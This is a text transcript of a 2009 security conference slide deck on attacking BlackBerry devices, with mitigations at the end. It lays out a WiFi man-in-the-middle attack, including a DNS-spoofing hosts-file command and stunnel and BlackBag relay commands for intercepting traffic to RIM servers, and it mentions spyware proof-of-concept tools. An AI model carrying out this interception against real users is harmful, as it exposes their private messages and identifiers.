attacking blackberry for phun and profit
TRANSCRIPT
![Page 1: Attacking Blackberry For Phun and Profit](https://reader036.vdocuments.site/reader036/viewer/2022062704/5559f724d8b42aa8098b48e1/html5/thumbnails/1.jpg)
Attacking BlackBerryfor phun and profit
y3dips[et]echo.or.id
Sunday, November 8, 2009
![Page 2: Attacking Blackberry For Phun and Profit](https://reader036.vdocuments.site/reader036/viewer/2022062704/5559f724d8b42aa8098b48e1/html5/thumbnails/2.jpg)
y3dips
• A Bandwidth Hunter ... A Renegade
• IT Security fans for more than 7 year
• http://google.com/search?q=y3dips
Sunday, November 8, 2009
![Page 3: Attacking Blackberry For Phun and Profit](https://reader036.vdocuments.site/reader036/viewer/2022062704/5559f724d8b42aa8098b48e1/html5/thumbnails/3.jpg)
BlackBerry
• Push Email
• Wireless Messaging System
• Phone, SMS, Cameras, Browsing
Sunday, November 8, 2009
![Page 4: Attacking Blackberry For Phun and Profit](https://reader036.vdocuments.site/reader036/viewer/2022062704/5559f724d8b42aa8098b48e1/html5/thumbnails/4.jpg)
• Photos
• Emails
• Sms
• Phone log
• Contact
BlackBerry
Sunday, November 8, 2009
![Page 5: Attacking Blackberry For Phun and Profit](https://reader036.vdocuments.site/reader036/viewer/2022062704/5559f724d8b42aa8098b48e1/html5/thumbnails/5.jpg)
BlackBerry
• BlackBerry Enterprise Server (BES)
• BlackBerry Internet Service (BIS)
Sunday, November 8, 2009
![Page 6: Attacking Blackberry For Phun and Profit](https://reader036.vdocuments.site/reader036/viewer/2022062704/5559f724d8b42aa8098b48e1/html5/thumbnails/6.jpg)
Diagram
http://smartphone.nttdocomo.co.jp/english/blackberrybold/blackberryservice/img/index/dgm_diagram.gif
Sunday, November 8, 2009
![Page 7: Attacking Blackberry For Phun and Profit](https://reader036.vdocuments.site/reader036/viewer/2022062704/5559f724d8b42aa8098b48e1/html5/thumbnails/7.jpg)
BB Proxy
• Attack BES network
• Defcon 2006 presented by Jesse D’aguanno
• Making a Blackberry Device as a gateway to internal Network
Sunday, November 8, 2009
![Page 8: Attacking Blackberry For Phun and Profit](https://reader036.vdocuments.site/reader036/viewer/2022062704/5559f724d8b42aa8098b48e1/html5/thumbnails/8.jpg)
Attacking Anatomy
INTERNET
INTERNAL LAN
Attacker
BB UserApps ServerServer
Firewall
Sunday, November 8, 2009
![Page 9: Attacking Blackberry For Phun and Profit](https://reader036.vdocuments.site/reader036/viewer/2022062704/5559f724d8b42aa8098b48e1/html5/thumbnails/9.jpg)
Attacking Anatomy
INTERNET
INTERNAL LAN
Attacker
BB User
Firewall
Apps ServerServer
Connecting into Attacker Computer
Sunday, November 8, 2009
![Page 10: Attacking Blackberry For Phun and Profit](https://reader036.vdocuments.site/reader036/viewer/2022062704/5559f724d8b42aa8098b48e1/html5/thumbnails/10.jpg)
Attacking Anatomy
INTERNET
INTERNAL LAN
Attacker
BB UserApps ServerServer
Connecting into Attacker Computer
Connecting into App Server
Firewall
Sunday, November 8, 2009
![Page 11: Attacking Blackberry For Phun and Profit](https://reader036.vdocuments.site/reader036/viewer/2022062704/5559f724d8b42aa8098b48e1/html5/thumbnails/11.jpg)
Attacking Anatomy
INTERNET
INTERNAL LAN
Attacker
BB UserApps ServerServer
Connecting into App Server
Connecting into Attacker Computer
Attacker 0wned Internal Network
Device as a proxy
Firewall
Sunday, November 8, 2009
![Page 12: Attacking Blackberry For Phun and Profit](https://reader036.vdocuments.site/reader036/viewer/2022062704/5559f724d8b42aa8098b48e1/html5/thumbnails/12.jpg)
Our Approach
• Attacking Wifi Network
• DNS Spoofing
• Ssl Tunneling - http://stunnel.org
• BlackBag - http://matasano.com
Sunday, November 8, 2009
![Page 13: Attacking Blackberry For Phun and Profit](https://reader036.vdocuments.site/reader036/viewer/2022062704/5559f724d8b42aa8098b48e1/html5/thumbnails/13.jpg)
DNS Spoofing
• Spoof dns entry into router/dns server# echo “133.7.133.7 rcp.ap.blackberry.com” >> /etc/hosts
Sunday, November 8, 2009
![Page 14: Attacking Blackberry For Phun and Profit](https://reader036.vdocuments.site/reader036/viewer/2022062704/5559f724d8b42aa8098b48e1/html5/thumbnails/14.jpg)
DNS Spoofing
Sunday, November 8, 2009
![Page 15: Attacking Blackberry For Phun and Profit](https://reader036.vdocuments.site/reader036/viewer/2022062704/5559f724d8b42aa8098b48e1/html5/thumbnails/15.jpg)
Stunnel
• Setup 2 SSL connection
• SSL Connection from BB device to Attacker machine
• SSL Connection from Attacker machine to BB Real Server
Sunday, November 8, 2009
![Page 16: Attacking Blackberry For Phun and Profit](https://reader036.vdocuments.site/reader036/viewer/2022062704/5559f724d8b42aa8098b48e1/html5/thumbnails/16.jpg)
Stunnel
# stunnel -d 443 -r localhost:8888
# stunnel -c -d 8889 -r 216.9.240.88:443
• Setup 2 SSL connection
Sunday, November 8, 2009
![Page 17: Attacking Blackberry For Phun and Profit](https://reader036.vdocuments.site/reader036/viewer/2022062704/5559f724d8b42aa8098b48e1/html5/thumbnails/17.jpg)
BlackBag
• Glue the tunnel back
# bkb replug -b localhost:8889@8888
Sunday, November 8, 2009
![Page 18: Attacking Blackberry For Phun and Profit](https://reader036.vdocuments.site/reader036/viewer/2022062704/5559f724d8b42aa8098b48e1/html5/thumbnails/18.jpg)
BlackBag
Sunday, November 8, 2009
![Page 19: Attacking Blackberry For Phun and Profit](https://reader036.vdocuments.site/reader036/viewer/2022062704/5559f724d8b42aa8098b48e1/html5/thumbnails/19.jpg)
Attacking Anatomy
RIM Network
DNS Server
WIFI
rcp.ap.blackberry.com216.9.240.88
search rcp.ap.blackberry.com
Attacker - 133.7.133.7
Sunday, November 8, 2009
![Page 20: Attacking Blackberry For Phun and Profit](https://reader036.vdocuments.site/reader036/viewer/2022062704/5559f724d8b42aa8098b48e1/html5/thumbnails/20.jpg)
Attacking Anatomy
RIM Network
DNS Server
Attacker - 133.7.133.7
WIFI
rcp.ap.blackberry.com216.9.240.88
search rcp.ap.blackberry.com
rcp.ap.blackberry.com133.7.133.7
Sunday, November 8, 2009
![Page 21: Attacking Blackberry For Phun and Profit](https://reader036.vdocuments.site/reader036/viewer/2022062704/5559f724d8b42aa8098b48e1/html5/thumbnails/21.jpg)
Attacking Anatomy
RIM Network
Tcp/8888Tcp/443
Tcp/8889
Tcp/443
DNS Server
WIFI
rcp.ap.blackberry.com133.7.133.7
rcp.ap.blackberry.com216.9.240.88
search rcp.ap.blackberry.com
Attacker - 133.7.133.7
Sunday, November 8, 2009
![Page 22: Attacking Blackberry For Phun and Profit](https://reader036.vdocuments.site/reader036/viewer/2022062704/5559f724d8b42aa8098b48e1/html5/thumbnails/22.jpg)
Viewable
Sunday, November 8, 2009
![Page 23: Attacking Blackberry For Phun and Profit](https://reader036.vdocuments.site/reader036/viewer/2022062704/5559f724d8b42aa8098b48e1/html5/thumbnails/23.jpg)
Viewable
Sunday, November 8, 2009
![Page 24: Attacking Blackberry For Phun and Profit](https://reader036.vdocuments.site/reader036/viewer/2022062704/5559f724d8b42aa8098b48e1/html5/thumbnails/24.jpg)
Result
Sunday, November 8, 2009
![Page 25: Attacking Blackberry For Phun and Profit](https://reader036.vdocuments.site/reader036/viewer/2022062704/5559f724d8b42aa8098b48e1/html5/thumbnails/25.jpg)
Result
• Clear Text Sender PIN
• Clear Text Recipient PIN
• Clear Text Message type
• Encrypted Data
Sunday, November 8, 2009
![Page 26: Attacking Blackberry For Phun and Profit](https://reader036.vdocuments.site/reader036/viewer/2022062704/5559f724d8b42aa8098b48e1/html5/thumbnails/26.jpg)
Impact
• Spam? until DDOS
• PIN abuse; such as cloning
• Blackmail; identity thief, logs
• Email and PIN Mapping
Sunday, November 8, 2009
![Page 27: Attacking Blackberry For Phun and Profit](https://reader036.vdocuments.site/reader036/viewer/2022062704/5559f724d8b42aa8098b48e1/html5/thumbnails/27.jpg)
Next
• More Data to analyze (different type)
• Attack the Encryption?
• Another Infrastructur attacking Scenario
Sunday, November 8, 2009
![Page 28: Attacking Blackberry For Phun and Profit](https://reader036.vdocuments.site/reader036/viewer/2022062704/5559f724d8b42aa8098b48e1/html5/thumbnails/28.jpg)
Confession
Sunday, November 8, 2009
![Page 29: Attacking Blackberry For Phun and Profit](https://reader036.vdocuments.site/reader036/viewer/2022062704/5559f724d8b42aa8098b48e1/html5/thumbnails/29.jpg)
Raw Data
Sunday, November 8, 2009
![Page 30: Attacking Blackberry For Phun and Profit](https://reader036.vdocuments.site/reader036/viewer/2022062704/5559f724d8b42aa8098b48e1/html5/thumbnails/30.jpg)
Mal(Spy)ware
• The Most Famous Etisalat Issue
• Firmware Update
• Reverse by some researcher
• 100% Spyware
Sunday, November 8, 2009
![Page 31: Attacking Blackberry For Phun and Profit](https://reader036.vdocuments.site/reader036/viewer/2022062704/5559f724d8b42aa8098b48e1/html5/thumbnails/31.jpg)
Mal(Spy)ware
Sunday, November 8, 2009
![Page 32: Attacking Blackberry For Phun and Profit](https://reader036.vdocuments.site/reader036/viewer/2022062704/5559f724d8b42aa8098b48e1/html5/thumbnails/32.jpg)
POC
• Provided by Sheran Gunasekera @HITB 2009
• Bugs - Forwarding Emails
• PhoneSnoop - Turn your BB into Spy devices
• http://chirashi.zensay.com
Sunday, November 8, 2009
![Page 33: Attacking Blackberry For Phun and Profit](https://reader036.vdocuments.site/reader036/viewer/2022062704/5559f724d8b42aa8098b48e1/html5/thumbnails/33.jpg)
Bugs
Sunday, November 8, 2009
![Page 34: Attacking Blackberry For Phun and Profit](https://reader036.vdocuments.site/reader036/viewer/2022062704/5559f724d8b42aa8098b48e1/html5/thumbnails/34.jpg)
Summary
• 0wned a blackberry with $20 (USD)
• Social Engineering rulez!
• BlackBerry User awareness
Sunday, November 8, 2009
![Page 35: Attacking Blackberry For Phun and Profit](https://reader036.vdocuments.site/reader036/viewer/2022062704/5559f724d8b42aa8098b48e1/html5/thumbnails/35.jpg)
Case Stories
Sunday, November 8, 2009
![Page 36: Attacking Blackberry For Phun and Profit](https://reader036.vdocuments.site/reader036/viewer/2022062704/5559f724d8b42aa8098b48e1/html5/thumbnails/36.jpg)
Case Stories
Sunday, November 8, 2009
![Page 37: Attacking Blackberry For Phun and Profit](https://reader036.vdocuments.site/reader036/viewer/2022062704/5559f724d8b42aa8098b48e1/html5/thumbnails/37.jpg)
Case Stories
Sunday, November 8, 2009
![Page 38: Attacking Blackberry For Phun and Profit](https://reader036.vdocuments.site/reader036/viewer/2022062704/5559f724d8b42aa8098b48e1/html5/thumbnails/38.jpg)
Mitigation
• Password Your Device
• Turn On Firewall
• Encrypt your Data/Media Card
• Controlling downloded application
• Protecting GPS location
• Connect to Legitimate Wifi Network
Sunday, November 8, 2009
![Page 39: Attacking Blackberry For Phun and Profit](https://reader036.vdocuments.site/reader036/viewer/2022062704/5559f724d8b42aa8098b48e1/html5/thumbnails/39.jpg)
References
• Attack Surface Analysis of Blackberry Devices - symantec
• BlackBerry: Call to Arms, some provided - Ftr & FX of Phenoelit
• BlackJaking:0wning the Enterprise via BlackBerry - x30n
• Bugs & Kissess: Spying on Blackberry User for Fun - Sheran Gunasekera
• Seberapa Amankah Infrastruktur WIFI Blackberry device anda - y3dips & chopstick
Sunday, November 8, 2009
![Page 40: Attacking Blackberry For Phun and Profit](https://reader036.vdocuments.site/reader036/viewer/2022062704/5559f724d8b42aa8098b48e1/html5/thumbnails/40.jpg)
Greetz
• Hermis Consulting
• Sheran Gunasekera
• Info Komputer
Sunday, November 8, 2009